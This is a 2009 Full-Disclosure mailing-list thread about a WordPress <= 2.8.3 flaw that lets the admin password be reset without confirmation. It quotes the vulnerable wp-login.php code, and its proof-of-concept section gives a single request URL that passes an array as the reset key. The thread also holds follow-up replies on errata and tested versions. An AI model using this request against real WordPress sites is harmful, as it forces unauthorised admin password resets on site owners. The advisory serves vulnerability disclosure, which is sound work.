[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password



Hi there,

This wasn't tested on the 2.7* branch.
It as been tested on the  2.8.* branch, with php 5.3.0 & php 5.2.9 as an
Apache 2.2.12 module, on a linux env.


Regards Laurent Gaffié



2009/8/10 Nicolas Valcárcel Scerpella <nicolas.valcarcel@xxxxxxxxxxxxx>

> I don't see the issue with wp 2.7.1
>
> On Mon, 10 Aug 2009, laurent gaffie wrote:
>
> > Errata:
> >
> > "V. BUSINESS IMPACT
> > -------------------------
> > An attacker could exploit this vulnerability to compromise the admin
> account
> > of any wordpress/wordpress-mu <= 2.8.3"
> >
> > -->
> >
> > "V. BUSINESS IMPACT
> > -------------------------
> > An attacker could exploit this vulnerability to reset the admin account
> of
> > any wordpress/wordpress-mu <= 2.8.3"
> >
> >
> > Regards Laurent Gaffié
> >
> >
> > 2009/8/10 laurent gaffie <laurent.gaffie@xxxxxxxxx>
> >
> > > =============================================
> > > - Release date: August 10th, 2009
> > > - Discovered by: Laurent Gaffié
> > > - Severity: Medium
> > > =============================================
> > >
> > > I. VULNERABILITY
> > > -------------------------
> > > WordPress <= 2.8.3 Remote admin reset password
> > >
> > > II. BACKGROUND
> > > -------------------------
> > > WordPress is a state-of-the-art publishing platform with a focus on
> > > aesthetics, web standards, and usability.
> > > WordPress is both free and priceless at the same time.
> > > More simply, WordPress is what you use when you want to work with your
> > > blogging software, not fight it.
> > >
> > > III. DESCRIPTION
> > > -------------------------
> > > The way Wordpress handle a password reset looks like this:
> > > You submit your email adress or username via this form
> > > /wp-login.php?action=lostpassword ;
> > > Wordpress send you a reset confirmation like that via email:
> > >
> > > "
> > > Someone has asked to reset the password for the following site and
> > > username.
> > > http://DOMAIN_NAME.TLD/wordpress
> > > Username: admin
> > > To reset your password visit the following address, otherwise just
> ignore
> > > this email and nothing will happen
> > >
> > >
> > >
> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
> > > "
> > >
> > > You click on the link, and then Wordpress reset your admin password,
> and
> > > sends you over another email with your new credentials.
> > >
> > > Let's see how it works:
> > >
> > >
> > > wp-login.php:
> > > ...[snip]....
> > > line 186:
> > > function reset_password($key) {
> > >     global $wpdb;
> > >
> > >     $key = preg_replace('/[^a-z0-9]/i', '', $key);
> > >
> > >     if ( empty( $key ) )
> > >         return new WP_Error('invalid_key', __('Invalid key'));
> > >
> > >     $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users
> WHERE
> > > user_activation_key = %s", $key));
> > >     if ( empty( $user ) )
> > >         return new WP_Error('invalid_key', __('Invalid key'));
> > > ...[snip]....
> > > line 276:
> > > $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
> > > $errors = new WP_Error();
> > >
> > > if ( isset($_GET['key']) )
> > >     $action = 'resetpass';
> > >
> > > // validate action so as to default to the login screen
> > > if ( !in_array($action, array('logout', 'lostpassword',
> 'retrievepassword',
> > > 'resetpass', 'rp', 'register', 'login')) && false ===
> > > has_filter('login_form_' . $action) )
> > >     $action = 'login';
> > > ...[snip]....
> > >
> > > line 370:
> > >
> > > break;
> > >
> > > case 'resetpass' :
> > > case 'rp' :
> > >     $errors = reset_password($_GET['key']);
> > >
> > >     if ( ! is_wp_error($errors) ) {
> > >         wp_redirect('wp-login.php?checkemail=newpass');
> > >         exit();
> > >     }
> > >
> > >     wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
> > >     exit();
> > >
> > > break;
> > > ...[snip ]...
> > >
> > > You can abuse the password reset function, and bypass the first step
> and
> > > then reset the admin password by submiting an array to the $key
> variable.
> > >
> > >
> > > IV. PROOF OF CONCEPT
> > > -------------------------
> > > A web browser is sufficiant to reproduce this Proof of concept:
> > > http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
> <http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
> > > The password will be reset without any confirmation.
> > >
> > > V. BUSINESS IMPACT
> > > -------------------------
> > > An attacker could exploit this vulnerability to compromise the admin
> > > account of any wordpress/wordpress-mu <= 2.8.3
> > >
> > > VI. SYSTEMS AFFECTED
> > > -------------------------
> > > All
> > >
> > > VII. SOLUTION
> > > -------------------------
> > > No patch aviable for the moment.
> > >
> > > VIII. REFERENCES
> > > -------------------------
> > > http://www.wordpress.org
> > >
> > > IX. CREDITS
> > > -------------------------
> > > This vulnerability has been discovered by Laurent Gaffié
> > > Laurent.gaffie{remove-this}(at)gmail.com
> > > I'd like to shoot some greetz to securityreason.com for them great
> > > research on PHP, as for this under-estimated vulnerability discovered
> by
> > > Maksymilian Arciemowicz :
> > > http://securityreason.com/achievement_securityalert/38
> > >
> > > X. REVISION HISTORY
> > > -------------------------
> > > August 10th, 2009: Initial release
> > >
> > > XI. LEGAL NOTICES
> > > -------------------------
> > > The information contained within this advisory is supplied "as-is"
> > > with no warranties or guarantees of fitness of use or otherwise.
> > > I accept no responsibility for any damage caused by the use or
> > > misuse of this information.
> > >
>
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> --
> Nicolas Valcárcel
> Security Engineer
> Custom Engineering Solutions Group
> Canonical OEM Services
> Mobile: +511 994 293 200
> Key fingerprint = 5C4D 0C85 D9C0 98FE 11F9  DD12 524E C3CD EF58 4970
> gpg --keyserver keyserver.ubuntu.com --recv-keys 654597FE
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (GNU/Linux)
>
> iQEcBAEBCAAGBQJKgNe5AAoJEFJOw83vWElwLj4H/3dk7RW9WJoUpzI6E5QKdXsF
> 7uNeGL8Yho9RZuPEK93IecImLa25Jy7KhzL+P4FfCCyYXVG8hxaUlUQss77PhsjK
> VG/YkDChiNJi2tj7jixcdpVy7MLiDxMiHBGNSzI2piBiZb3/toSBvZslSW2yqgIk
> OkqbJ7AE5yTu4sulhO29DRYzFUjvZHGKR2akRu/3RlOUHhwVDJw0m2ZO4M3MHz4+
> 1x/w7HhzmbMo/kioxJpPsU7f+axVnRMia9dZmvakfhmNdht98qAE/a7UlpT+ft1w
> Vua7DRYwOn4o5UYXhBmUL/uCUt3CLeT9Jgu0/bWZ3G3gR1Rw1edS7E5Q7A9wlEY=
> =UdOl
> -----END PGP SIGNATURE-----
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/